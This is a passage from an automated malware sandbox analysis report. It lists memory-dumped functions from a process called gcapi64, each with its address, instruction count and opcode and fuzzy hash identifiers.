                                                                  • Opcode Fuzzy Hash: d57a0f84804b6c84b841a97dfbb11f4cecc6b5f64478b31126b2e1e8af8d32f6
                                                                  • Instruction Fuzzy Hash: 8AD15D30A1990D8FDFD4EF98C4A5EA977E2FF68340F550169E40DD32A6CE65E841CB80
                                                                  Function 00007FFD9BA12656 Relevance: .4, Instructions: 396COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f7c198a16f844061939fc07e39f4ce53c783a25650725d6a4a85fb5daa38dd9f
                                                                  • Instruction ID: eb94db5358d1667d9c955771bc2336058d91d9b0cf1227e55b48e23b76a326dc
                                                                  • Opcode Fuzzy Hash: f7c198a16f844061939fc07e39f4ce53c783a25650725d6a4a85fb5daa38dd9f
                                                                  • Instruction Fuzzy Hash: B6C11631B0EB8D4FE7A5DBAC846566577E1EF99314B0A00FAD08DC71A3DE68EC468341
                                                                  Function 00007FFD9BA10AB0 Relevance: .4, Instructions: 387COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b8e28ede774a77e998c2aba56f10a0ac6abdda6b5a259591c73b6ecd996da362
                                                                  • Instruction ID: 67741494f3869a31c837053c72dd644d9acec3aec3dd73e98c81ed4b80523007
                                                                  • Opcode Fuzzy Hash: b8e28ede774a77e998c2aba56f10a0ac6abdda6b5a259591c73b6ecd996da362
                                                                  • Instruction Fuzzy Hash: 6DB10930B1DE0D4FDBA8EBAC8465AB973E1FF58700F41417AE04DC72A6DE24AC428784
                                                                  Function 00007FFD9BA00270 Relevance: .4, Instructions: 383COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c2a170027fb2bcf9ea168fcb7d1b05cf897b0796e32ddf3c48375be6b1d93d37
                                                                  • Instruction ID: 444dbd5f2ffc5d9b19dd7d75c218630c08847b092949690c3c852d44c97d195b
                                                                  • Opcode Fuzzy Hash: c2a170027fb2bcf9ea168fcb7d1b05cf897b0796e32ddf3c48375be6b1d93d37
                                                                  • Instruction Fuzzy Hash: 9EC1C430A18A0D8FDBA8EF68C455BB8B7E1FF99310F1101B9D45EC72A2DE74AD418B41
                                                                  Function 00007FFD9B790B6D Relevance: .4, Instructions: 373COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2100797828.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b790000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7e8a81122be5b9a75cafa2f846a238b86d6418c341302c902ca2247d4b8e8ac3
                                                                  • Instruction ID: 16f7c8b25336977672083b9261719d36c41335612a9bc4c75b8a439e41c3b0ae
                                                                  • Opcode Fuzzy Hash: 7e8a81122be5b9a75cafa2f846a238b86d6418c341302c902ca2247d4b8e8ac3
                                                                  • Instruction Fuzzy Hash: FEB12822B1EB8E4FEBA5DB6C48645B57BE1EF56A10B0902FBD45CC71F3D918AC058341
                                                                  Function 00007FFD9BA17F5D Relevance: .4, Instructions: 366COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9946978c6ea307ca76daaf3c7ebf36f4a97eed6c15cb930f9f23374b6b3e96f2
                                                                  • Instruction ID: 6d229cd02e974a08ba7bcc7f7385cb7de1d050b5f6fd7bb8212bbb34eb7fe356
                                                                  • Opcode Fuzzy Hash: 9946978c6ea307ca76daaf3c7ebf36f4a97eed6c15cb930f9f23374b6b3e96f2
                                                                  • Instruction Fuzzy Hash: 72B18A32F1EA8E0FD7A9976C94651B977D1EF85320F1541BFD08AC31E2DD6CAA428381
                                                                  Function 00007FFD9BA129D4 Relevance: .4, Instructions: 352COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: dc55cd0fb5b2a5a5adcc7be7db97c43539835ccb6202cda47bf41e8987f5bb82
                                                                  • Instruction ID: e2cc95f0e725a43d7147bf9065107f4113038c69a9b56769b1bca93e65e580c0
                                                                  • Opcode Fuzzy Hash: dc55cd0fb5b2a5a5adcc7be7db97c43539835ccb6202cda47bf41e8987f5bb82
                                                                  • Instruction Fuzzy Hash: A1A1C331B1DE0D4FDBA8EB9C9465AB877E1EF59300F45017AD04EC32A6DE65EC428781
                                                                  Function 00007FFD9BA14DB6 Relevance: .3, Instructions: 340COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4f4fce77dac286d5de56197eb7ae03fc74eaf50f04993907e43a77c00afa5f36
                                                                  • Instruction ID: 6494f55775b836e8ae0942af6bede7fcaa5c6ac7ce66a38273e67aac6dca5011
                                                                  • Opcode Fuzzy Hash: 4f4fce77dac286d5de56197eb7ae03fc74eaf50f04993907e43a77c00afa5f36
                                                                  • Instruction Fuzzy Hash: 09A1C730B0991D4FDB98EBACD4646B977E1FF89310F5500BDD04EC72A2CE69A9428780
                                                                  Function 00007FFD9BA00480 Relevance: .3, Instructions: 333COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6994a95a1a1ec893cb6dfa3505a5426f87a693eed14cb79a9cae8b8dd26901d2
                                                                  • Instruction ID: 24bcf6560a7de09030fbea351cb7838ac93fab2ada05417e9735e47ec72cb55c
                                                                  • Opcode Fuzzy Hash: 6994a95a1a1ec893cb6dfa3505a5426f87a693eed14cb79a9cae8b8dd26901d2
                                                                  • Instruction Fuzzy Hash: 4FA1D131B0DA4D4FDBA8EBA894612BD77E1FF89714F05417DD49EC32A2CE79A8028744
                                                                  Function 00007FFD9BA02A9B Relevance: .3, Instructions: 324COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 57578d3d99106c7efbb24b9e0d80b280eb318ed1b2720871094ef7fc5de9fa6c
                                                                  • Instruction ID: c09fad8179ef563140f3450c29b071c8d1db8d84e02350ab17076f2333f5c29e
                                                                  • Opcode Fuzzy Hash: 57578d3d99106c7efbb24b9e0d80b280eb318ed1b2720871094ef7fc5de9fa6c
                                                                  • Instruction Fuzzy Hash: C6B15D70A19A0E8FEBA8DF98C491669B3E1FF59305F1141BDD04ED3291CA75E982CB40
                                                                  Function 00007FFD9BA09ED8 Relevance: .3, Instructions: 324COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1a19ec395d800f8ab6910edf346be9a412a9aee32003cbfc02b06c97b56c6438
                                                                  • Instruction ID: 21e34b9448a27bdc99e1d3ac1020fec550f1efb1fc18e25e63daf6505f493247
                                                                  • Opcode Fuzzy Hash: 1a19ec395d800f8ab6910edf346be9a412a9aee32003cbfc02b06c97b56c6438
                                                                  • Instruction Fuzzy Hash: 74A1E571B0D95D4FDBE4EB688861BB9B3E1EFA9300F4501B9D04DD32A2DE74AD468740
                                                                  Function 00007FFD9BA13660 Relevance: .3, Instructions: 297COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3dfd4133d28de192b60e50539188a34f33ee74294b38c83436efc3fb67f11e3a
                                                                  • Instruction ID: 94b9f2fe23fc926f4d6302c82dd37d57137529118d9af6b74703fa26f2931d33
                                                                  • Opcode Fuzzy Hash: 3dfd4133d28de192b60e50539188a34f33ee74294b38c83436efc3fb67f11e3a
                                                                  • Instruction Fuzzy Hash: 51918D72B0FACA1FE7A5DB7C44655647BE0EF55310B0901FED089CB2A3D958AC46C381
                                                                  Function 00007FFD9BA05BC7 Relevance: .3, Instructions: 293COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8657030af3290dd8897046507aab31b4fe5e38ce58ec79ce1b0a0277b523391e
                                                                  • Instruction ID: cb8722d415f5c564f80b9efa90e8bfb20567942fc5c6a3f281ebc4e692fe0925
                                                                  • Opcode Fuzzy Hash: 8657030af3290dd8897046507aab31b4fe5e38ce58ec79ce1b0a0277b523391e
                                                                  • Instruction Fuzzy Hash: 4991B430B09A0D4FEB689B5C88A576977E1FF59300F5541BED48EC32E2CE78A9868741
                                                                  Function 00007FFD9BA0E3F2 Relevance: .3, Instructions: 287COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 89defbe9d51b121edd2b8d6d5a53d48c9c319d2893fdfd8d0663c99ce4655840
                                                                  • Instruction ID: 190a66516e80dfb67fe1ab0fe2b414d827664f10b85be30a98643897eadb1907
                                                                  • Opcode Fuzzy Hash: 89defbe9d51b121edd2b8d6d5a53d48c9c319d2893fdfd8d0663c99ce4655840
                                                                  • Instruction Fuzzy Hash: 36810722B0E7961FE315A77CA8754E63F90EF42238B0901FBD4DD8E0E3DE19654A8395
                                                                  Function 00007FFD9BA001A0 Relevance: .3, Instructions: 287COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a15fd64ec62cb59290df79ed9c6e1091a9ebf65d9d8d11e974e9c7dbc09a6f85
                                                                  • Instruction ID: 6ac23ebd3e0956501a18851164ee92f31c8dd3bd01cc650adf650797846ba33b
                                                                  • Opcode Fuzzy Hash: a15fd64ec62cb59290df79ed9c6e1091a9ebf65d9d8d11e974e9c7dbc09a6f85
                                                                  • Instruction Fuzzy Hash: 3C713721B1EE4E0FE7A8975C90656B933C2EF9A750F0540BED08EC32D3DD58AD024385
                                                                  Function 00007FFD9BA05BEA Relevance: .3, Instructions: 284COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0eb26f13df6f820d4d4c4ab18d95c468efad2efeab0883e738cf36ebe6a4dff5
                                                                  • Instruction ID: bd6eb2695294c2230d07d7fb07b0e2e9c40cb1518676b4f5ea24cfa58e129765
                                                                  • Opcode Fuzzy Hash: 0eb26f13df6f820d4d4c4ab18d95c468efad2efeab0883e738cf36ebe6a4dff5
                                                                  • Instruction Fuzzy Hash: E691A130B09A0D4FEBA8DB5C88A576977E1FF59300F5541BDD48EC32A2CE78E9858781
                                                                  Function 00007FFD9BA0ED60 Relevance: .3, Instructions: 283COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c1c3eb4c4d9dfde862814ecea4cdc2314179449d1e01919efb2cd6479ca5c556
                                                                  • Instruction ID: a8522698ce81bc2bfbd9a0e76c5f11c56e9b16a15bd007dede8c6c4161f5fe27
                                                                  • Opcode Fuzzy Hash: c1c3eb4c4d9dfde862814ecea4cdc2314179449d1e01919efb2cd6479ca5c556
                                                                  • Instruction Fuzzy Hash: 5871D322B0E94D0FEBA5976C847567427D1EF9A750F4600BAE4CEC72F2DD58AD428341
                                                                  Function 00007FFD9BA09ED0 Relevance: .3, Instructions: 268COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7d00b9c9a6b8d5e37e81f447f89589da7d69fa006ef8d2c222f9073eb75d389e
                                                                  • Instruction ID: ba1597f60dab0428fe742f718e4d7ae7f1e4699c0741f7fc1e695b10c7148efb
                                                                  • Opcode Fuzzy Hash: 7d00b9c9a6b8d5e37e81f447f89589da7d69fa006ef8d2c222f9073eb75d389e
                                                                  • Instruction Fuzzy Hash: 28813B32B0EA8D4FD7A1D77888646A53BE1EF56311F0A01FAD49DCB1F3DD1869068741
                                                                  Function 00007FFD9BA16A78 Relevance: .3, Instructions: 261COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6345095620717396344b8a37280ffd9649511ec52e6f3d27d044a4278cb7779d
                                                                  • Instruction ID: e81f756e98093308f1dcba08917f0c0790f152be0f2ec66894da359a3041cbc2
                                                                  • Opcode Fuzzy Hash: 6345095620717396344b8a37280ffd9649511ec52e6f3d27d044a4278cb7779d
                                                                  • Instruction Fuzzy Hash: A2718A32B0EB8A4FE7A4D7BC94655A57BE0EF44350B0805FFD089CB1F2DE58A9428301
                                                                  Function 00007FFD9BA09FA0 Relevance: .3, Instructions: 260COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 98759e878f4af1fcd1bf1690106a0c437e48fddec9822bce330d7196782e5643
                                                                  • Instruction ID: 4e142050f2fd8ec240b16ae671bcf6e6d9114582f226a314008f769883d00d66
                                                                  • Opcode Fuzzy Hash: 98759e878f4af1fcd1bf1690106a0c437e48fddec9822bce330d7196782e5643
                                                                  • Instruction Fuzzy Hash: E861F621B0E9490FEBA9D76C94656753BD1EF8A36070601FAE04DC72B6DD58AC428741
                                                                  Function 00007FFD9BA1D0F4 Relevance: .2, Instructions: 244COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 27733494abe677b29af483c497a43cee79e8a6736a6d06834edfd285f47d8c48
                                                                  • Instruction ID: 7f7b9fd4575ff0c7742d304ccf2331f5e216aa21abb7de580806f7017ee04d3f
                                                                  • Opcode Fuzzy Hash: 27733494abe677b29af483c497a43cee79e8a6736a6d06834edfd285f47d8c48
                                                                  • Instruction Fuzzy Hash: 6F810231A0E69D8FDF52DF58D8646EA7BB1EF5A310F0601BBD448D72A2CB34A905C790
                                                                  Function 00007FFD9BA01F05 Relevance: .2, Instructions: 237COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a2b9a1b0eafab6c9fd9ec4ef3ec515f6df925997166fc4f693923cb243a83a3b
                                                                  • Instruction ID: 345d2a56b767f6534d54fa297b7144985e3cf95e6ff98d6c61a63a28943ac892
                                                                  • Opcode Fuzzy Hash: a2b9a1b0eafab6c9fd9ec4ef3ec515f6df925997166fc4f693923cb243a83a3b
                                                                  • Instruction Fuzzy Hash: AA819630A19B4D8FDB94DB688464BA97BF1FF59300F5444E9D48DDB2A6CA35ED81CB00
                                                                  Function 00007FFD9B6C7808 Relevance: .2, Instructions: 223COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2098345271.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b6c0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9b1eaff80c9dc94698b8ad617a83c4a7ec8e13aea950b2225a3d83a5c1bf6b7e
                                                                  • Instruction ID: 5ffb6ec390a264d17e3a75795989c4cf960869a5fa7385789aa51ef7fd7fc3e7
                                                                  • Opcode Fuzzy Hash: 9b1eaff80c9dc94698b8ad617a83c4a7ec8e13aea950b2225a3d83a5c1bf6b7e
                                                                  • Instruction Fuzzy Hash: 8B51E133B094194FD308BBACF4659F97790EF8523574802F3D65DCF1A7EE29A8468290
                                                                  Function 00007FFD9BA110FA Relevance: .2, Instructions: 220COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c22caab0a89d6a11a3122544572cf5d7d20a79582bc41e9ebb232fad778585d8
                                                                  • Instruction ID: 02033c1077c4d92a004bf93c5a89178c16fd77e776f8c2c0b232f0a911cc9ab2
                                                                  • Opcode Fuzzy Hash: c22caab0a89d6a11a3122544572cf5d7d20a79582bc41e9ebb232fad778585d8
                                                                  • Instruction Fuzzy Hash: BD61A370B0EA5D4FDBE4DB688861BB977E2EFA9300F0541B9D04DD32A2DE746D458780
                                                                  Function 00007FFD9BA01FA9 Relevance: .2, Instructions: 217COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9188513bd2590d62afc212f011918c6df21a2173e674f0985196ecaa34ac0d1a
                                                                  • Instruction ID: 6157e3f38e7a1010a3441c0277ed651bb18ff034131ba81ad3f30f0cf351f862
                                                                  • Opcode Fuzzy Hash: 9188513bd2590d62afc212f011918c6df21a2173e674f0985196ecaa34ac0d1a
                                                                  • Instruction Fuzzy Hash: 5371A830A19B4D5FEB94DBA88464BA97BF1FF59300F5444E9D48DDB2A6CA39EC81C700
                                                                  Function 00007FFD9B6C7820 Relevance: .2, Instructions: 208COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2098345271.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b6c0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e857160bee9611d7dd191bda1f49d4a5989ae34ec3fdfcdbffd42b77578dbac0
                                                                  • Instruction ID: c444de3b88a634a819a04fc06993231b0a5c3453d20e7fc82f3ad1ebd5c8a477
                                                                  • Opcode Fuzzy Hash: e857160bee9611d7dd191bda1f49d4a5989ae34ec3fdfcdbffd42b77578dbac0
                                                                  • Instruction Fuzzy Hash: 7151E133B094094FD708BBBCB4699F93790EF8523574802B7D65DCF1A7EE29A8468390
                                                                  Function 00007FFD9BA05874 Relevance: .2, Instructions: 197COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 10cf035ed75401cd174b8902fc5355f7ec796fc00c630f3ff1ea8f1c26367d3c
                                                                  • Instruction ID: 41455f98b7ec8d818f8a0e00622eeeb01898c2575d1978aefaa55e700e109390
                                                                  • Opcode Fuzzy Hash: 10cf035ed75401cd174b8902fc5355f7ec796fc00c630f3ff1ea8f1c26367d3c
                                                                  • Instruction Fuzzy Hash: 04514831B0EA4D4FE768DB6888A51B977E1FF46311F05017EC08AC71E2DF69B9068780
                                                                  Function 00007FFD9BA04360 Relevance: .2, Instructions: 196COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8c9ca8b0e4d11bc97107dcccf46984bfdd5f0e3bc711add2cd78df3a88a1253a
                                                                  • Instruction ID: 9f2ec70193b6942452d6acbca72ce57345f1c93dbc4dff6f2d99dfd53905a2e1
                                                                  • Opcode Fuzzy Hash: 8c9ca8b0e4d11bc97107dcccf46984bfdd5f0e3bc711add2cd78df3a88a1253a
                                                                  • Instruction Fuzzy Hash: 7C514732B0EE4E0FE7A8976C94A55B437E1FF8A360B0501BED089C71E7EE15AC428341
                                                                  Function 00007FFD9B79203B Relevance: .2, Instructions: 193COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2100797828.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b790000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8843fbf29cbce140e9df91d3145f0b3bcaeee6a0421b2541260d3a7609f0d01d
                                                                  • Instruction ID: c8b212cb2e2b22dd0ab3584a8f50a2428d79a6d29e70733f3af04eec57eb0cde
                                                                  • Opcode Fuzzy Hash: 8843fbf29cbce140e9df91d3145f0b3bcaeee6a0421b2541260d3a7609f0d01d
                                                                  • Instruction Fuzzy Hash: F1510522B0EB8A0FFBE9BAEC54B56B976D1EF65250B0901BAD55DC71F3DD18AC008341
                                                                  Function 00007FFD9B6CC37E Relevance: .2, Instructions: 191COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2098345271.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b6c0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0b87a5cd5af83d4d48dd4cfb7a909aef97236b7c5e29a24015c3ca4d1fe2ca51
                                                                  • Instruction ID: ec94dbf6e52e17009309f0dfe9bc5685619b95971352627e26b17e6c8b356b81
                                                                  • Opcode Fuzzy Hash: 0b87a5cd5af83d4d48dd4cfb7a909aef97236b7c5e29a24015c3ca4d1fe2ca51
                                                                  • Instruction Fuzzy Hash: E551C722B0A9494FE798F7BCA469A7877E2DF9925070500F6E51DCB3B7EE15BC424340
                                                                  Function 00007FFD9BA05DC0 Relevance: .2, Instructions: 184COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
